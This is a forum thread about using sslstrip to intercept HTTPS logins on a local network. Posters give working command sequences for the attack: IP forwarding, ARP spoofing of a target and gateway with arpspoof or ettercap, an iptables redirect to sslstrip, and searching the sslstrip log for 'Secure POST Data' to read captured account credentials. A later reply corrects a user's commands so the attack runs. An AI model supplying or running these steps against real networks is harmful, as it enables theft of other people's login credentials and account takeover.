Yea that's a nice method to ease your work :)Quote:
Originally Posted by Eatme
Printable View
Yea that's a nice method to ease your work :)Quote:
Originally Posted by Eatme
thanks sir..
Also another way of doing it (which I think is BEST)
sslstrip -a -k -f -l 8080
kate sslstrip.log
Ctrl+F (find)
Ctrl+v (past) "Secure POST Data"
and you will see the following (Ex: login.yahoo.com) login details within the next line.
F3 will guide you through all of your logins by order of entry.
Hope this helps anyone who is having trouble filtering out all the bs in the logs...
http://img202.imageshack.us/img202/9...tripsearch.png
great tutorial,, althou im wondering, what command in here, is it that gives no warning?
and how do you know what to grep for? and when to do it?
also with this i noticed you did not sign into yahoo mail, is it becouse account did not exist? im guessing that anyway :P
i kinda lol'd when i saw "w00t no warning" then "wrong account info" in other window ^^
Well it was not a valid yahoo account, but if it were valid it would have signed in. The questions about what to grep for have been answered by Eatme pretty much and the question about when to do it, really depends on when the victim logs in :)Quote:
Originally Posted by krillerill
Hi,
I successfully ran sslstrip within my own network against my second laptop, and it worked perfectly. However, subsequent attempts against that laptop are not working. For one thing, when I check the MAC address on the victim machine (arp -a) I am not getting the same results as I did on the first attempt. Also, the log file I am keeping on the attacker machine is empty. Most importantly, when I went to gmail (on subsequent attempts) I got https instead of http.
Here are the commands I used on the first (and subsequent attempts):
cd sslstrip-0.7
echo 1 > /proc/sys/net/ipv4/ip-forward
arpspoof -1 wlan0 -t 192.168.5 192.168.2.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
python sslstrip.py -w logfile
Running backtrack 4
I am wondering whether there are any specific commands I should have run after the first attempt to terminate/kill some of these processes, keeping in mind that after the first successful attempt I completely shut down the attacker machine and put the victim machine into sleep mode before attempting subsequent attempts (and I rebooted the wireless router).
Any ideas welcome
Thanks
Vindal
Ok so first of all, check that you have no firewall on.
Second I would suggest you do this using ettercap too like this:
Your command looks like this:
[CODE]echo 1 > /proc/sys/net/ipv4/ip-forward[/CODE
When it should look like this:
Next:Code:echo 1 > /proc/sys/net/ipv4/ip_forward
If you also want ettercap here, you edit /etc/etter.conf and then typeCode:arpspoof -i wlan0 -t target gateway (not arpspoof -1)
sslstrip -a -f -k
Code:ettercap -T -q -i wlan0